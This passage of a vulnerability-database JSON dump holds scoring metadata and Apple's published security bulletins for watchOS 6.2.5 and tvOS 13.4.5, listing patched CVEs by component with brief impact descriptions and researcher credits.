"REDHAT-RHSA-2020-0819.NASL", "REDHAT-RHSA-2020-0820.NASL", "REDHAT-RHSA-2020-0905.NASL", "REDHAT-RHSA-2020-0914.NASL", "REDHAT-RHSA-2020-0918.NASL", "REDHAT-RHSA-2020-0919.NASL", "REDHAT-RHSA-2020-4451.NASL", "SLACKWARE_SSA_2020-070-01.NASL", "SLACKWARE_SSA_2020-073-01.NASL", "SL_20200316_FIREFOX_ON_SL6_X.NASL", "SL_20200316_FIREFOX_ON_SL7_X.NASL", "SL_20200319_THUNDERBIRD_ON_SL7_X.NASL", "SL_20200323_THUNDERBIRD_ON_SL6_X.NASL", "SUSE_SU-2020-0686-1.NASL", "SUSE_SU-2020-0717-1.NASL", "UBUNTU_USN-4299-1.NASL", "UBUNTU_USN-4335-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704639", "OPENVAS:1361412562310704642", "OPENVAS:1361412562310704645", "OPENVAS:1361412562310816617", "OPENVAS:1361412562310816700", "OPENVAS:1361412562310816701", "OPENVAS:1361412562310816702", "OPENVAS:1361412562310816703", "OPENVAS:1361412562310816705", "OPENVAS:1361412562310816706", "OPENVAS:1361412562310816710", "OPENVAS:1361412562310816711", "OPENVAS:1361412562310816712", "OPENVAS:1361412562310817028", "OPENVAS:1361412562310817029", "OPENVAS:1361412562310817030", "OPENVAS:1361412562310817130", "OPENVAS:1361412562310817131", "OPENVAS:1361412562310817133", "OPENVAS:1361412562310844361", "OPENVAS:1361412562310844399", "OPENVAS:1361412562310853069", "OPENVAS:1361412562310853076", "OPENVAS:1361412562310853077", "OPENVAS:1361412562310877603", "OPENVAS:1361412562310877627", "OPENVAS:1361412562310877632", "OPENVAS:1361412562310883201", "OPENVAS:1361412562310883203", "OPENVAS:1361412562310883213", "OPENVAS:1361412562310883214", "OPENVAS:1361412562310892140", "OPENVAS:1361412562310892150"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0815", "ELSA-2020-0820", "ELSA-2020-0905", "ELSA-2020-0919", "ELSA-2020-4451"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157926"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A"]}, {"type": "redhat", "idList": ["RHSA-2020:4451"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-9802", "RH:CVE-2020-9805", "RH:CVE-2020-9806", "RH:CVE-2020-9807", "RH:CVE-2020-9843", "RH:CVE-2020-9850"]}, {"type": "slackware", "idList": ["SSA-2020-070-01", "SSA-2020-073-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0340-1", "OPENSUSE-SU-2020:0365-1", "OPENSUSE-SU-2020:0366-1", "OPENSUSE-SU-2020:0389-1"]}, {"type": "threatpost", "idList": ["THREATPOST:ABBA6B89522F29EE1F01F3D010F46FC0"]}, {"type": "ubuntu", "idList": ["USN-4299-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-20503", "UB:CVE-2020-9794", "UB:CVE-2020-9802", "UB:CVE-2020-9803", "UB:CVE-2020-9805", "UB:CVE-2020-9806", "UB:CVE-2020-9807", "UB:CVE-2020-9843", "UB:CVE-2020-9850"]}, {"type": "zdi", "idList": ["ZDI-20-671", "ZDI-20-672", "ZDI-20-673", "ZDI-20-682"]}, {"type": "zdt", "idList": ["1337DAY-ID-34510"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "watchos", "version": 6}]}, "epss": [{"cve": "CVE-2020-9827", "epss": "0.005320000", "percentile": "0.735430000", "modified": "2023-03-20"}, {"cve": "CVE-2014-9512", "epss": "0.014190000", "percentile": "0.844620000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9791", "epss": "0.001180000", "percentile": "0.441250000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9803", "epss": "0.006360000", "percentile": "0.758880000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9819", "epss": "0.004430000", "percentile": "0.709140000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9852", "epss": "0.001090000", "percentile": "0.423430000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9805", "epss": "0.003020000", "percentile": "0.648270000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9806", "epss": "0.006390000", "percentile": "0.760210000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9812", "epss": "0.000840000", "percentile": "0.340370000", "modified": "2023-03-20"}, {"cve": "CVE-2020-3878", "epss": "0.001260000", "percentile": "0.455310000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9839", "epss": "0.001160000", "percentile": "0.437310000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9795", "epss": "0.001090000", "percentile": "0.423430000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9813", "epss": "0.000830000", "percentile": "0.336260000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9821", "epss": "0.001090000", "percentile": "0.423430000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9802", "epss": "0.575570000", "percentile": "0.971330000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9809", "epss": "0.000660000", "percentile": "0.269850000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9800", "epss": "0.004430000", "percentile": "0.709150000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9842", "epss": "0.000800000", "percentile": "0.327960000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9815", "epss": "0.001180000", "percentile": "0.441250000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9790", "epss": "0.007650000", "percentile": "0.784010000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9850", "epss": "0.426500000", "percentile": "0.967150000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9829", "epss": "0.001800000", "percentile": "0.534810000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9807", "epss": "0.006390000", "percentile": "0.760210000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9808", "epss": "0.000810000", "percentile": "0.331000000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9811", "epss": "0.000840000", "percentile": "0.340370000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9843", "epss": "0.003300000", "percentile": "0.664690000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9814", "epss": "0.000830000", "percentile": "0.336260000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9816", "epss": "0.001180000", "percentile": "0.441250000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9789", "epss": "0.007650000", "percentile": "0.784010000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9797", "epss": "0.000660000", "percentile": "0.269850000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9794", "epss": "0.003580000", "percentile": "0.677220000", "modified": "2023-03-20"}, {"cve": "CVE-2020-9994", "epss": "0.000610000", "percentile": "0.237030000", "modified": "2023-03-20"}, {"cve": "CVE-2019-20503", "epss": "0.005040000", "percentile": "0.727880000", "modified": "2023-03-19"}, {"cve": "CVE-2020-9818", "epss": "0.016550000", "percentile": "0.856470000", "modified": "2023-03-19"}], "vulnersScore": 0.8}, "affectedSoftware": [{"name": "watchos", "operator": "lt", "version": "6.2.5"}], "scheme": null, "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "_state": {"dependencies": 1660004461, "score": 1698853730, "affected_software_major_version": 1666695388, "epss": 1679323282}, "_internal": {"score_hash": "13ce40d7d5a995fc11e70f027206e60b"}}

{"apple": [{"lastseen": "2023-11-28T22:12:14", "description": "# About the security content of watchOS 6.2.5\n\nThis document describes the security content of watchOS 6.2.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## watchOS 6.2.5\n\nReleased May 18, 2020\n\n**Accounts**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt\n\n**AppleMobileFileIntegrity**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application could interact with system processes to access private information and perform privileged actions\n\nDescription: An entitlement parsing issue was addressed with improved parsing.\n\nCVE-2020-9842: Linus Henze (pinauten.de)\n\n**Audio**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Audio**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**CoreText**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam\u2019s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com\n\n**FontParser**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9816: Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to determine another application's memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2020-9797: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9811: Tielei Wang of Pangu Lab\n\nCVE-2020-9812: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-9813: Xinru Chi of Pangu Lab\n\nCVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9809: Benjamin Randazzo (@____benjamin)\n\n**libxpc**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may be able to overwrite arbitrary files\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-9994: Apple\n\nEntry added September 21, 2020\n\n**Mail**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted mail message may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2020-9819: ZecOps.com\n\n**Mail**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9818: ZecOps.com\n\n**rsync**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to overwrite existing files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2014-9512: gaojianfeng\n\nEntry added July 28, 2020\n\n**SQLite**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**System Preferences**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9839: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebRTC**\n\nAvailable for: Apple Watch Series 1 and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2019-20503: natashenka of Google Project Zero\n\n## Additional recognition\n\n**CoreText**\n\nWe would like to acknowledge Jiska Classen (@naehrdine) and Dennis Heinze (@ttdennis) of Secure Mobile Networking Lab for their assistance.\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**IOHIDFamily**\n\nWe would like to acknowledge Andy Davis of NCC Group for their assistance.\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Luke Walker of Manchester Metropolitan University for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 03, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "apple", "title": "About the security content of watchOS 6.2.5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9512", "CVE-2019-20503", "CVE-2020-3878", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9791", "CVE-2020-9794", "CVE-2020-9795", "CVE-2020-9797", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9808", "CVE-2020-9809", "CVE-2020-9811", "CVE-2020-9812", "CVE-2020-9813", "CVE-2020-9814", "CVE-2020-9815", "CVE-2020-9816", "CVE-2020-9818", "CVE-2020-9819", "CVE-2020-9821", "CVE-2020-9827", "CVE-2020-9829", "CVE-2020-9839", "CVE-2020-9842", "CVE-2020-9843", "CVE-2020-9850", "CVE-2020-9852", "CVE-2020-9994"], "modified": "2020-05-18T00:00:00", "id": "APPLE:B4A51DEE7A0FB4F7EC28603D8D3C11F4", "href": "https://support.apple.com/kb/HT211175", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T22:12:12", "description": "# About the security content of tvOS 13.4.5\n\nThis document describes the security content of tvOS 13.4.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## tvOS 13.4.5\n\nReleased May 26, 2020\n\n**Accounts**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt\n\n**AppleMobileFileIntegrity**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application could interact with system processes to access private information and perform privileged actions\n\nDescription: An entitlement parsing issue was addressed with improved parsing.\n\nCVE-2020-9842: Linus Henze (pinauten.de)\n\n**Audio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Audio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**CoreText**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam\u2019s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9816: Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**IPSec**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9837: Thijs Alkemade of Computest\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to determine another application's memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2020-9797: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9811: Tielei Wang of Pangu Lab\n\nCVE-2020-9812: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-9813: Xinru Chi of Pangu Lab\n\nCVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9809: Benjamin Randazzo (@____benjamin)\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to overwrite arbitrary files\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-9994: Apple\n\nEntry added September 21, 2020\n\n**rsync**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to overwrite existing files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2014-9512: gaojianfeng\n\nEntry added July 28, 2020\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2020-9854: Ilias Morad (A2nkF)\n\nEntry added July 28, 2020\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**System Preferences**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9839: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebRTC**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2019-20503: natashenka of Google Project Zero\n\n## Additional recognition\n\n**CoreText**\n\nWe would like to acknowledge Jiska Classen (@naehrdine) and Dennis Heinze (@ttdennis) of Secure Mobile Networking Lab for their assistance.\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**IOHIDFamily**\n\nWe would like to acknowledge Andy Davis of NCC Group for their assistance.\n\n**IPSec**\n\nWe would like to acknowledge Thijs Alkemade of Computest for their assistance.\n\nEntry added August 10, 2020\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Luke Walker of Manchester Metropolitan University for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional 